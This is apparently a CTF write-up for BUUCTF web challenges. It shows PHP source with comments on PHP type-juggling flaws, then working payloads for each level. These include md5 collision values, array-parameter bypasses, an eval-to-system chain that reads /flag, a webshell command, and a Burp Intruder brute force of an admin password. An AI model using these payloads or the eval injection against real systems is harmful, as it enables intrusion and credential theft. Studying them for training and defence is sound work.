http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
flag
flag{32ae814a-7562-460c-a936-e6b88ed93f8f}
Begin of PHP
<?php
// Challenge source.  $flag1..$flag5 are never initialised; error_reporting(0)
// hides the undefined-variable notices (and every other warning below).
error_reporting(0);
highlight_file(__FILE__);
if (isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    // Level 1: `==` between two md5() hex strings is a loose comparison, so
    // hashes that both look like "0e<digits>" compare equal as numbers.
    // A fix is `===` or hash_equals().
    if ($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}
if ($flag1){
    echo "=Level 2=<br>";
    // Level 2: md5() and sha1() return NULL for a non-string argument (the
    // warning is suppressed above), and NULL === NULL holds.  The input type
    // is never checked.
    if (isset($_POST['key3'])){
        if (md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}
if ($flag2){
    echo "=Level 3=<br>";
    // Level 3: strcmp() with a non-string argument also yields NULL, and
    // NULL == 0 is true, so the comparison against the flag never has to match.
    if (isset($_GET['key4'])){
        if (strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}
if ($flag3){
    echo "=Level 4=<br>";
    // Level 4: a non-numeric value can still satisfy `> 2023` under PHP's
    // loose comparison rules; "not numeric" is no substitute for validating
    // the type.
    if (isset($_GET['key5'])){
        if (!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}
if ($flag4){
    echo "=Level 5=<br>";
    // Level 5: extract($_POST) turns every posted field into a variable,
    // including $flag5 and names this script itself uses, and it runs
    // before the character filter below.  Read explicit keys instead.
    extract($_POST);
    foreach ($_POST as $var){
        if (preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if ($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}
get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
R!C!E!
<?php
// Challenge source.
highlight_file(__FILE__);
if (isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    // Only the first 6 hex digits (24 bits) of the hash are compared, so a
    // matching password is found by brute force (the write-up used 114514).
    if (substr($password,0,6)==="c4d038"){
        // A regex denylist in front of eval() is not a security boundary:
        // eval() on request data is the vulnerability regardless of which
        // words the pattern rejects.
        if (!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
}
爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
EasyLogin
密码应该是个md5
随便注册个用户看看
登录成功后看看源代码可以肯定是md5
是个弱口令
尝试爆破admin
发送到intruder
payload位置选择pwd
payload设置一下,尝试用1400w_rockyou字典 爆破, processing设置成md5
有个8360的不一样,应该就是爆破成功的,把pw复制一下
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
修改完pw后一直点放行,抓到含flag的response包